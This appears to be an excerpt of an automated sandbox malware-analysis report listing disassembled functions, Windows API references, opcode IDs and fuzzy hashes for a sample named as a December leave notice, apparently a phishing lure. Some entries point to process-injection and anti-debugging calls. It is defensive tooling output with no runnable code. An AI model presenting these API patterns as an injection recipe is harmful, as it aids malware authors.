                                                      • Opcode ID: 85ca7889b962f49ce0bfd708c8f3105b22556779a5a91615d652b64a85a0aed8
                                                      • Instruction ID: 0c47ac4b7b9691e7573971f71ff3b3d6a499e8b34fd9727d7e7b588a62e53385
                                                      • Opcode Fuzzy Hash: 85ca7889b962f49ce0bfd708c8f3105b22556779a5a91615d652b64a85a0aed8
                                                      • Instruction Fuzzy Hash: 6E71CFF89413418BC324EF5AE7D0498BBA4BB98340784822ED0C9C7399CB3E74A0DF54
                                                      APIs
                                                      • _strcat.LIBCMT ref: 00FE08FD
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • _wcscpy.LIBCMT ref: 00FE098C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1012013722-0
                                                      • Opcode ID: ef19f0e7052173ab25cc01f25c08b9c715d1503496c3f32ba08029784fa346a7
                                                      • Instruction ID: 67ce1e3d5ce5a52ead80e4d8c72819060fdf48e561d6f26038832303a0a4d4ee
                                                      • Opcode Fuzzy Hash: ef19f0e7052173ab25cc01f25c08b9c715d1503496c3f32ba08029784fa346a7
                                                      • Instruction Fuzzy Hash: 4D915E35A00605DFCB18DF18C991AADB7E5FF49310B548069E85ACF352DB78ED41EB80
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00F83A73
                                                        • Part of subcall function 00FA1405: __lock.LIBCMT ref: 00FA140B
                                                        • Part of subcall function 00F83ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F83AF3
                                                        • Part of subcall function 00F83ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F83B08
                                                        • Part of subcall function 00F83D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F83AA3,?), ref: 00F83D45
                                                        • Part of subcall function 00F83D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00F83AA3,?), ref: 00F83D57
                                                        • Part of subcall function 00F83D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,01041148,01041130,?,?,?,?,00F83AA3,?), ref: 00F83DC8
                                                        • Part of subcall function 00F83D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00F83AA3,?), ref: 00F83E48
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F83AB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 924797094-0
                                                      • Opcode ID: cd6792336192eb174748faecaf96e0c13d155a22d36852c028357249c0a319f4
                                                      • Instruction ID: 4c50526b08ed49e2a57868f6eb390a4a50a974d296f67512bac5036825adfd9f
                                                      • Opcode Fuzzy Hash: cd6792336192eb174748faecaf96e0c13d155a22d36852c028357249c0a319f4
                                                      • Instruction Fuzzy Hash: C211D5B56083419FC310EF59E94595EFBE4FF94710F00491FF484832A1DB79A544DB92
                                                      APIs
                                                      • ___lock_fhandle.LIBCMT ref: 00FAEA29
                                                      • __close_nolock.LIBCMT ref: 00FAEA42
                                                        • Part of subcall function 00FA7BDA: __getptd_noexit.LIBCMT ref: 00FA7BDA
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                      • String ID:
                                                      • API String ID: 1046115767-0
                                                      • Opcode ID: 11cc1a1c6d4803b25f11180937df24887eea6d4f1c1be17f31df3963bfea8011
                                                      • Instruction ID: a92eb25dfe60c07f9b5682b4525ccf019915e69170e317f4da3e57e77cd96ab1
                                                      • Opcode Fuzzy Hash: 11cc1a1c6d4803b25f11180937df24887eea6d4f1c1be17f31df3963bfea8011
                                                      • Instruction Fuzzy Hash: EF11ACF29096109BD322BF689D827593A606F83331F2A0340E4609F1E6CBBC9C01B7A1
                                                      APIs
                                                        • Part of subcall function 00FA395C: __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA395C: __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      • std::exception::exception.LIBCMT ref: 00F9F51E
                                                      • __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                        • Part of subcall function 00FA6805: RaiseException.KERNEL32(?,?,0000000E,01036A30,?,?,?,00F9F538,0000000E,01036A30,?,00000001), ref: 00FA6856
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 18c5388b7ebe37dd322053f2d679d180a92555babbd51df71a06ef58be06224c
                                                      • Instruction ID: 6417bebbc146a062462aa93394d1559ac20ac85120dc8d70281359860a729e7f
                                                      • Opcode Fuzzy Hash: 18c5388b7ebe37dd322053f2d679d180a92555babbd51df71a06ef58be06224c
                                                      • Instruction Fuzzy Hash: 76F0F47140020D67EB05FFDDDC019DE77ACAF02324F684025F948D2181CB759684E7B5
                                                      APIs
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __lock_file.LIBCMT ref: 00FA3629
                                                        • Part of subcall function 00FA4E1C: __lock.LIBCMT ref: 00FA4E3F
                                                      • __fclose_nolock.LIBCMT ref: 00FA3634
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: f2d2a8534e043ac321a31ab79f1936f2966392bcb3520c09d998d7d09d6225ce
                                                      • Instruction ID: 09bacfd5ec2a9e60123f0c75b9484ac967891138c115883388e497a77b4934e3
                                                      • Opcode Fuzzy Hash: f2d2a8534e043ac321a31ab79f1936f2966392bcb3520c09d998d7d09d6225ce
                                                      • Instruction Fuzzy Hash: 4AF090F2D01204AAD711BF658C02B6E7AA06F53330F298108F420EB3C1CB7C9A41BE55
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01A4B83B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A4B8D1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A4B8F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction ID: 2cfa43d9a713565365c99f4004d335761b84f934585e729687ca17aa5d3383ac
                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction Fuzzy Hash: C712BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4E81CB5A
                                                      APIs
                                                      • __flush.LIBCMT ref: 00FA2A0B
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __flush__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 4101623367-0
                                                      • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                      • Instruction ID: db10ada71400649b4d125794f63e3e71e103046ff1dd09dadf7f0e74f0afacf6
                                                      • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                      • Instruction Fuzzy Hash: 014192B1B007069FDB689FADC8805AF77A6AF4A770F24852DE855C7240EB78DD41BB40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 503b564bdb90c88c8c9349f1ac245b9321a9a29d3039a99c06f80ad61c9ef511
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 0331D675A00105DBEB18DF58C480A69FBB6FF49350B6486A6E809CB356DB31EDC1EB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 116d8a26fdb6399dc9c222242ea9b482d089d5d08bf6796c7e4ddf602a97e30c
                                                      • Instruction ID: c0265c399321a35f092e8ecfd9b471a01da3ca845426045e9f04b7b9d1049fc3
                                                      • Opcode Fuzzy Hash: 116d8a26fdb6399dc9c222242ea9b482d089d5d08bf6796c7e4ddf602a97e30c
                                                      • Instruction Fuzzy Hash: 6A31B276104A58DFCF01EF41D48176E7BB0FF48320F14844AE9951B385DBB4A945EF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: b5fe5ffa07f0da30f8b3e1daaca10440114232336ffea9cbe6305028a483d876
                                                      • Instruction ID: b80c9c71bec9e58603ab85e31faba740f77ad78da855b711eeda3438265ff3ea
                                                      • Opcode Fuzzy Hash: b5fe5ffa07f0da30f8b3e1daaca10440114232336ffea9cbe6305028a483d876
                                                      • Instruction Fuzzy Hash: E9417F745086018FEB24DF14C484B1ABBE0BF85318F19896CE99A4B362C776F845EF52
                                                      APIs
                                                        • Part of subcall function 00F84214: FreeLibrary.KERNEL32(00000000,?), ref: 00F84247
                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F839FE,?,00000001), ref: 00F841DB
                                                        • Part of subcall function 00F84291: FreeLibrary.KERNEL32(00000000), ref: 00F842C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load
                                                      • String ID:
                                                      • API String ID: 2391024519-0
                                                      • Opcode ID: ed848234250833e1626e801701fa30de7e0d72842df73f4966b71fe7fbbdbc1c
                                                      • Instruction ID: e2294b141f814f0f155bb8744f318b47685b9ed56fb63fe58384ea3acbacee44
                                                      • Opcode Fuzzy Hash: ed848234250833e1626e801701fa30de7e0d72842df73f4966b71fe7fbbdbc1c
                                                      • Instruction Fuzzy Hash: D1119431604207AADF10FB64DC06FEE77A59F40710F108429F596A61C1DA79AA04BB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 6d263825510c8683587858b7853adf760bfc232b3ccf2236e8b0553d021d2870
                                                      • Instruction ID: a7664b22bf487682241d5c7bbdf22043188d0020f8337a5288f637d2b44b64b1
                                                      • Opcode Fuzzy Hash: 6d263825510c8683587858b7853adf760bfc232b3ccf2236e8b0553d021d2870
                                                      • Instruction Fuzzy Hash: 65213974508601CFEB24DF64C444B1ABBE1BF85304F29496CEA9A4B261CB36F845EF52
                                                      APIs
                                                      • ___lock_fhandle.LIBCMT ref: 00FAAFC0
                                                        • Part of subcall function 00FA7BDA: __getptd_noexit.LIBCMT ref: 00FA7BDA
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit$___lock_fhandle
                                                      • String ID:
                                                      • API String ID: 1144279405-0
                                                      • Opcode ID: dac3d2ae93b6242547670f84c1d8f7509548615a0eb9fd8f512ab13261097f26
                                                      • Instruction ID: bb44241b79b5cef85792967f8f6b5e1c50b732421ca1cbf93c4418fd89ca7a00
                                                      • Opcode Fuzzy Hash: dac3d2ae93b6242547670f84c1d8f7509548615a0eb9fd8f512ab13261097f26
                                                      • Instruction Fuzzy Hash: AC118FF28096409FD7267FA49C4275A3A60AF83331F1A8240E5745F1E7CBBD9D05BBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                      • Instruction ID: 262cd176a334c9d040567d76281cde4225543456ada66f86dd61957f62937e6a
                                                      • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                      • Instruction Fuzzy Hash: A501863150010EEECF45FF64CC928FEBB74EF10314F008029B525971A5EA34AB49EB60
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00FA2AED
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 127840eb1bbaa6e8ccba033f1b7bcaeef8d4dd1067d43572c9d4cd8b2dd17ee5
                                                      • Instruction ID: 89336a9349ffc2265c6f7a9dace3b5035e9db8dd680f6512765cba415b73fa75
                                                      • Opcode Fuzzy Hash: 127840eb1bbaa6e8ccba033f1b7bcaeef8d4dd1067d43572c9d4cd8b2dd17ee5
                                                      • Instruction Fuzzy Hash: 8AF0CDB1A00215ABDF61BFA88C0279F3AA5BF42320F198415B8249A191C7BC8A52FB51
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,00F839FE,?,00000001), ref: 00F84286
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: f76ce6502307def062e5a28f09c4d62449cb4dcff4e096b39e52d72960f8da9e
                                                      • Instruction ID: 1f075c5dee83c6740a71429428eadb50b1d7b93dfb7528d33f0c18eae05f9440
                                                      • Opcode Fuzzy Hash: f76ce6502307def062e5a28f09c4d62449cb4dcff4e096b39e52d72960f8da9e
                                                      • Instruction Fuzzy Hash: 5EF039B1909703DFCB34AFA4D890896BBE4BF053253248A3EF1D682610C732A840EF50
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F840C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID:
                                                      • API String ID: 82841172-0
                                                      • Opcode ID: f00a9db60a3f658eefa1cf301ec3841c56bf63a8abfdb141633195ab892b068d
                                                      • Instruction ID: 0f8a93d63e90b2d9614e5fb23b6eaf838feb2f4e4fa894f5d109725b2e19e39a
                                                      • Opcode Fuzzy Hash: f00a9db60a3f658eefa1cf301ec3841c56bf63a8abfdb141633195ab892b068d
                                                      • Instruction Fuzzy Hash: 8EE0CD765001245BC711A794CC46FEA779DDF88690F050075F905D7244DD6CD9819790
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01A4C091
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: c17c79bf7e14d2599be58fce2c3f6e343b433c32667fedf4c67a4911971bd71c
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: EDE0E67494110DDFDB00EFB4D54969E7FB4EF44711F100161FD05D2281D6719D508A62
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00FEF87D
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FEF8DC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FEF919
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FEF940
                                                      • SendMessageW.USER32 ref: 00FEF966
                                                      • _wcsncpy.LIBCMT ref: 00FEF9D2
                                                      • GetKeyState.USER32(00000011), ref: 00FEF9F3
                                                      • GetKeyState.USER32(00000009), ref: 00FEFA00
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FEFA16
